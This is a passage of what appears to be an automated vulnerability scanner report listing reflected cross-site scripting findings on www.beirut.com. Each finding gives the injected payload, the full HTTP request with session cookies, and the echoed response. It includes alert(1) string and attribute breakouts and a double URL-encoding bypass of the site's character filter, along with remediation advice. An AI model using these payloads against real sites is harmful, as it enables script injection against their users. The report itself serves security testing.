This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Festivals9b690"><a>bf31567f7f3/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:59:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Festivals9b690"><a>bf31567f7f3&listingtype=events.php&Types=4">
...[SNIP]...

4.1101. http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Festivals/272910464

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30f44'-alert(1)-'fbf0ff05bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Festivals30f44'-alert(1)-'fbf0ff05bf/272910464 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:09:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Festivals30f44'-alert(1)-'fbf0ff05bf';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1102. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3b7"><a>cd78af03c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDocb3b7"><a>cd78af03c39/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=ThingsToDocb3b7"><a>cd78af03c39/Gatherings&listingtype=events.php&Types=">
...[SNIP]...

4.1103. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54a8f'-alert(1)-'5c8fa22cc09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo54a8f'-alert(1)-'5c8fa22cc09/Gatherings/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:04:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo54a8f'-alert(1)-'5c8fa22cc09/Gatherings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1104. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621ed"><a>df0156576a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Gatherings621ed"><a>df0156576a4/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Gatherings621ed"><a>df0156576a4&listingtype=events.php&Types=14">
...[SNIP]...

4.1105. http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gatherings/9274143605

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26451'-alert(1)-'fc0e4a8341b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Gatherings26451'-alert(1)-'fc0e4a8341b/9274143605 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Gatherings26451'-alert(1)-'fc0e4a8341b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1106. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e45e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34969f99ff4 was submitted in the REST URL parameter 4. This input was echoed as 5e45e"><script>alert(1)</script>34969f99ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/19215e45e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e34969f99ff4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:34:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=19215e45e"><script>alert(1)</script>34969f99ff4&randstyle=green">
...[SNIP]...

4.1107. http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8903e%2527%253balert%25281%2529%252f%252f0b6b7031eb1 was submitted in the REST URL parameter 4. This input was echoed as 8903e';alert(1)//0b6b7031eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/19218903e%2527%253balert%25281%2529%252f%252f0b6b7031eb1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:36:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='19218903e';alert(1)//0b6b7031eb1';
var showfacebox='';
</script>
...[SNIP]...

4.1108. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 382ca%2527%253balert%25281%2529%252f%252f69c1aa4ab53 was submitted in the REST URL parameter 4. This input was echoed as 382ca';alert(1)//69c1aa4ab53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138382ca%2527%253balert%25281%2529%252f%252f69c1aa4ab53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:35:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6138382ca';alert(1)//69c1aa4ab53';
var showfacebox='';
</script>
...[SNIP]...

4.1109. http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 322c3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebeaa1e96712 was submitted in the REST URL parameter 4. This input was echoed as 322c3"><script>alert(1)</script>beaa1e96712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138322c3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebeaa1e96712 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:33:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6138322c3"><script>alert(1)</script>beaa1e96712&randstyle=magenta">
...[SNIP]...

4.1110. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed52038f0d04 was submitted in the REST URL parameter 4. This input was echoed as 77b09"><script>alert(1)</script>d52038f0d04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/600077b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed52038f0d04 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:28:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=600077b09"><script>alert(1)</script>d52038f0d04&randstyle=green">
...[SNIP]...

4.1111. http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb14%2527%253balert%25281%2529%252f%252f5a59de710bb was submitted in the REST URL parameter 4. This input was echoed as 1cb14';alert(1)//5a59de710bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/60001cb14%2527%253balert%25281%2529%252f%252f5a59de710bb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='60001cb14';alert(1)//5a59de710bb';
var showfacebox='';
</script>
...[SNIP]...

4.1112. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6bf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee39e0afcf6e was submitted in the REST URL parameter 4. This input was echoed as b6bf2"><script>alert(1)</script>e39e0afcf6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

